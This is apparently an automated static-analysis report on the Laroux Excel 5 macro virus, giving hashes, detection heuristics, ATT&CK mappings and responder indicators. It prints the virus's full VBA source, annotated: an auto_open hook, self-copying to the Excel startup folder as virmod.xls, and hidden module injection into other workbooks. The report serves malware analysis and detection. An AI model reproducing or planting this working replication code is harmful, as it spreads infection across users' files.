Win.Trojan.Laroux-71 — Office (OLE) malware analysis

Static analysis result for SHA-256 68ee1de0931ce38e…

MALICIOUS

Office (OLE)

33.0 KB Created: 1998-11-07 01:35:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 32f204240fca11604a87819fef084cb5 SHA-1: 71ed984e258554ce3fcd0b48cf7a2a807d5bdc3f SHA-256: 68ee1de0931ce38e1c22903b89b0f5c4931c87099c831b4c883103b8dbf44448
180 Risk Score

Malware Insights

Win.Trojan.Laroux-71 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

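The file is identified as a malicious Excel 5 macro virus, specifically Win.Trojan.Laroux-71. The auto_open macro runs automatically when the document is opened and registers a sheet-activation handler. The extracted macro shown below contains no download routine: 'virmod.xls' is a copy of the macro module that the handler saves into the Excel startup folder, from which it is inserted into other workbooks as a hidden 'forecastmod' module. This is a classic self-replicating macro virus that persists through the Excel startup folder, not a downloader for a second-stage payload.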

Heuristics 4

  • ClamAV: Win.Trojan.Laroux-71 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Laroux-71
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10326 bytes
SHA-256: c55f6ff47f4fc3fc70ef8a8317928ca46572476309e3375418f2db10a95b96db
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "forecastmod"

' auto_open: entry point of the sample. Excel runs a procedure with this name
' when the workbook is opened, so opening the file with macros allowed is the
' only trigger. It does not replicate anything itself; it only installs the
' sheet-activation hook that later runs Forecast.
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Seed the random generator; get_txtfile uses Rnd() for its file-name suffix.
    Randomize Timer
    ' Runtime errors in this procedure are skipped silently instead of raising a dialog.
    On Error Resume Next
    ' If this is the only open workbook and it has no worksheets, open a new empty workbook.
    If Application.Workbooks.Count = 1 And ActiveWorkbook.Worksheets.Count = 0 Then Application.Workbooks.Add
    ' Hook: from now on Excel calls "forecast" every time a sheet is activated.
    Application.OnSheetActivate = "forecast"
End Sub

' Forecast: sheet-activation handler that carries the replication logic.
' It has two branches, selected by whether "virmod.xls" already exists in
' Excel's startup folder (Application.StartupPath):
'   - present: insert the macro source into the active workbook as a hidden
'     module sheet named "forecastmod" (infection of another workbook);
'   - absent:  save a copy of this workbook's "forecastmod" sheet into the
'     startup folder as "virmod.xls" (persistence; compare ATT&CK T1137,
'     Office Application Startup).
' Artefacts visible in this code that a responder can look for:
'   - "virmod.xls" in the Excel startup folder;
'   - a hidden module sheet named "forecastmod" placed before the first sheet;
'   - text files named "virmod" + two characters + ".txt" in the parent
'     directory of the startup folder;
'   - Title/Subject/Author/Keywords/Comments blanked on the saved copy.
Sub Forecast()
Attribute Forecast.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Remove the hook while this handler runs; presumably so that the sheet
    ' activations performed below do not re-trigger it.
    Application.OnSheetActivate = ""
    ' Stop screen redraws so the sheet and window changes below are not shown.
    Application.ScreenUpdating = False
    ' Does "virmod.xls" exist in the startup folder? (StrComp mode 1 = text, case-insensitive)
    If StrComp(Dir(Application.StartupPath & "\" & "virmod.xls"), "virmod.xls", 1) = 0 Then
        ' Startup copy exists: make sure a text export of the module is on disk.
        ck_txtfile
        t$ = "virmod"
        ' get_txtfile receives t$ by reference and rewrites it to the generated
        ' file name; s$ becomes the full path. A fresh Rnd() is drawn on each
        ' call, so this name is not necessarily the one ck_txtfile just used.
        s$ = get_txtfile(get_parent_of_start & "\", t$)
        ' Only workbooks that contain no module sheet are touched.
        If ActiveWorkbook.Modules.Count = 0 Then
            ' Remember the user's workbook and sheet so focus can be restored.
            activewbn$ = ActiveWorkbook.Name
            activeshn$ = ActiveSheet.Name
            ' Proceed only if the first sheet is not already "forecastmod" and
            ' a text file with exactly the generated name exists.
            If (StrComp(Workbooks(activewbn$).Sheets(1).Name, "forecastmod", 1) <> 0) And (StrComp(Dir(s$), t$, 1) = 0) Then
                ' Add a module sheet in front of the first sheet ...
                ActiveWorkbook.Modules.Add before:=Workbooks(activewbn$).Sheets(1)
                With ActiveWorkbook.Modules(1)
                    ' ... name it, load the macro source from the text file, and hide it.
                    .Name = "forecastmod"
                    .InsertFile s$, True
                    .Visible = False
                End With
                ' Put the user's original sheet back in front.
                Workbooks(activewbn$).Worksheets(activeshn$).Activate
            End If
        End If
    Else
        ' No startup copy yet: create it from this workbook's module sheet.
        ' start$ is assigned here but not read again in this procedure.
        start$ = Application.StartupPath
        If ActiveWorkbook.Modules.Count = 1 Then
            ' Target path of the copy. Note the forward slash here, whereas the
            ' existence check at the top of the procedure uses a backslash.
            s$ = Application.StartupPath & "/" & "virmod.xls"
            cname$ = ActiveWorkbook.Name
            With Sheets("forecastmod")
                ' Unhide the module sheet and copy it. Copy without a destination
                ' puts the sheet into a new workbook, which becomes the active one.
                .Visible = True
                .Select
                .Copy
            End With
            ' Blank the document properties of the (now active) copy.
            With ActiveWorkbook
                .Title = ""
                .Subject = ""
                .Author = ""
                .Keywords = ""
                .Comments = ""
            End With
            activewbn$ = ActiveWorkbook.Name
            ' Save the current directory, switch to the startup folder, hide the
            ' window of the copy, and write it out as a normal workbook without passwords.
            cwd$ = CurDir()
            ChDir Application.StartupPath
            ActiveWindow.Visible = False
            Workbooks(activewbn$).SaveAs Filename:=s$, FileFormat:=xlNormal, password:="", writeResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
            ' Restore the working directory and hide the module sheet in the source workbook again.
            ChDir cwd$
            Workbooks(cname$).Sheets("forecastmod").Visible = False
        End If
    End If
    With Application
        ' Re-enable redraws and re-arm the hook, now pointing at the procedure
        ' inside the startup copy ("virmod.xls!forecast").
        .ScreenUpdating = True
        .OnSheetActivate = "virmod.xls!forecast"
    End With
End Sub

' ck_txtfile: writes a plain-text export of the "forecastmod" module sheet
' when no file with the generated name exists yet. The target is the parent
' directory of the Excel startup folder; the file name comes from get_txtfile
' ("virmod" + two characters + ".txt") and changes from call to call.
' NOTE(review): Workbooks("virmod.xls") must already be open for the SaveAs to
' work; presumably Excel has loaded it from the startup folder - confirm.
Sub ck_txtfile()
Attribute ck_txtfile.VB_ProcData.VB_Invoke_Func = " \n14"
    t$ = "virmod"
    ' t$ is rewritten by get_txtfile to the generated file name; s$ is the full path.
    s$ = get_txtfile(get_parent_of_start & "\", t$)
    ' Export only if no file with that name is present (text comparison, case-insensitive).
    If StrComp(Dir(s$), t$, 1) <> 0 Then
        Workbooks("virmod.xls").Sheets("forecastmod").SaveAs Filename:=s$, FileFormat:=xlText, CreateBackup:=False
    End If
End Sub

' get_txtfile: builds a randomised text-file path.
'   s$ - directory prefix, expected to end with a path separator.
'   t$ - base name; it is not declared ByVal, so VBA passes it by reference
'        and the caller's variable is changed to the generated file name.
' Returns s$ followed by the generated file name.
Function get_txtfile(s$, t$)
Attribute get_txtfile.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Last two characters of "00" + the text form of a random number below 100
    ' (usually two digits, since the value is not rounded first).
    r$ = Right$("00" & CStr(Rnd() * 100), 2)
    ' Generated name: base + suffix + ".txt".
    t$ = t$ & r$ & ".txt"
    get_txtfile = s$ & t$
End Function

' get_parent_of_start: returns the parent directory of Excel's startup folder
' (Application.StartupPath) without a trailing backslash, or "" when no usable
' backslash is found.
Function get_parent_of_start()
Attribute get_parent_of_start.VB_ProcData.VB_Invoke_Func = " \n14"
    p$ = Application.StartupPath
    ' m tracks the last backslash seen that is not the final character of p$.
    m = 0
    n = InStr(1, p$, "\", 1)
    ' Walk from backslash to backslash; stop when none is left or when the
    ' backslash found is the last character of the path.
    While n > 0 And n < Len(p$)
        m = n
        n = InStr(m + 1, p$, "\", 1)
    Wend
    If m > 1 Then
        ' Everything before the last interior backslash is the parent directory.
        get_parent_of_start = Left$(p$, m - 1)
    Else
        get_parent_of_start = ""
    End If
End Function








' Processing file: /opt/analyzer/scan_staging/4741b67e8f2c437ba586fc14aea2ba6b.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/forecastmod - 5078 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub auto_open())
' Line #2:
' 	Ld Timer 
' 	ArgsCall Read 0x0001 
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	Ld Application 
' 	MemLd Workbooks 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	Eq 
' 	Ld ActiveWorkbook 
' 	MemLd Worksheets 
' 	MemLd Count 
' 	LitDI2 0x0000 
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	Ld Application 
' 	MemLd Workbooks 
' 	ArgsMemCall Add 0x0000 
' 	EndIf 
' Line #5:
' 	LitStr 0x0008 "fo
... (truncated)